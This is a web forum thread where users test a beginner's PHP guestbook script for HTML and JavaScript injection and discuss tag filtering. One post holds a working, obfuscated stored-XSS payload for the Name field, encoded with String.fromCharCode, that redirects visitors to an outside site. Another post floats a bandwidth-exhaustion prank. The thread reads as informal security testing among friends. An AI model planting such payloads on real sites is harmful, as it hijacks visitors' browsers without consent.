Guestbook version .999 (my first script, almost done!)

[LazyJim]

ok next thing u need to do is apply the same HTML removal to all the fields not just the comment!

[sim]

lets make it play like 1000 flash movies and exeed his bandwich limit.

[sim]

damn you jim, now i cant do what i wanted to do, coulda at least just use a pop up window. =(

[LazyJim]

lol i made a little tool where i can type any strings and because the <script> tag works in the Name: field I can execute it!
I put this in the name field to change the title to "LazyJim" then alert it, then go to another site ...
[code:1:99ffeb4b80]<script>document.location=String.fromCharCode(106, 97,118,97,115,99,114,105,112,116,58,105,102,32,40, 100,111,99,117,109,101,110,116,46,116,105,116,108, 101,61,39,76,97,122,121,74,105,109,39,41,32,97,108 ,101,114,116,40,39,76,97,122,121,74,105,109,39,41, 59,118,111,105,100,40,100,111,99,117,109,101,110,1 16,46,108,111,99,97,116,105,111,110,61,39,104,116, 116,112,58,47,47,119,119,119,46,97,108,112,104,97, 45,109,97,116,114,105,120,45,100,101,115,105,103,1 10,46,99,111,46,117,107,47,105,109,103,47,104,99,1 05,95,100,114,101,97,109,46,104,116,109,108,39,41) </script>[/code:1:99ffeb4b80]

[LazyJim]

Sorry sim

[LazyJim]

ok i added another hack to stop the one before from working

[sim]

now i cant post ;[

[LazyJim]

why not?

*edit* link to posting page at the top of comments page (not just the bottom)

[LazyJim]

gona go to bed now I've had some fun!
the posting page if u havn't found it:
http://www.xlthosting.com/lom/dbfreegb/posting.php

[Leader of Men]

You guys did all that destruction just in the comments box? I said I hadn't fixxxed the others yet!

[Brian]

Quote:

Originally Posted by Ferre

Quote:

I guess he means to say "copy advanced guestbook" :wink:

I use it at the ministry's website and it has everything this script misses.

Suggesting one feature that multiple guestbook scripts have (not just AG ), isn't copying AG.

LoM - Looking better. You going to submit it to hotscripts?

[Leader of Men]

Yes I will, but first I want to make sure it's solid, I still need to fix the other fields (if comments is even fixed) then make a few styles for it.

I'm also going to make a MySQL version...

[sim]

Maybe you want to fix my topsite list script? i'll give you half credit then we submit it to hotscripts. www.po2.net/topsite.php might still work. DONT GO POSTING HTML, IM SERIOUS, i'll GET REAL MAD NO LIE

[Leader of Men]

I could make a script for you when the guestbook is complete

Did you wreck the site inside the comments box?

[sim]

i dont need you to make me a script, my script is done. Just buggy (same problems you got) html being posted cause errors. And i used flat files.

i havnt wrecked your guest book since last night.

[Leader of Men]

Well who did wreck it? I need to know where and how...

[LazyJim]

I wasn't doing it in the comments box sorry!

I'm not an expert i was just playing around with any JavaScript i could get into the other fields!

I think you need someone with deeper knowledge of PHP or whatever language u wrote it in to test the comments box.

[LazyJim]

Can we see you script please?
if it's going to be on hotscripts people might look up the workings of it before attaking a guestbook.

[sim]

i attacked the comments box the first time with html code. i think theres a php function striphtml or striptags.

[LazyJim]

yeah i was wondering how to get past the strip-html-tags and/or convert-to-entities filters, but I'm not that experienced with PHP. I did read those functions can have problems with <!DOCTYPE> declarations though I'm not sure how it can help take advantage of the thing.

If the facility is left not secure (ppl will keep on finding ways to get through anyway), the biggest threat is to readers having malicious code installed on their machine (in the same way any site can); to sensitive info on the server being accessed; malicious scripts/code being installed on the server.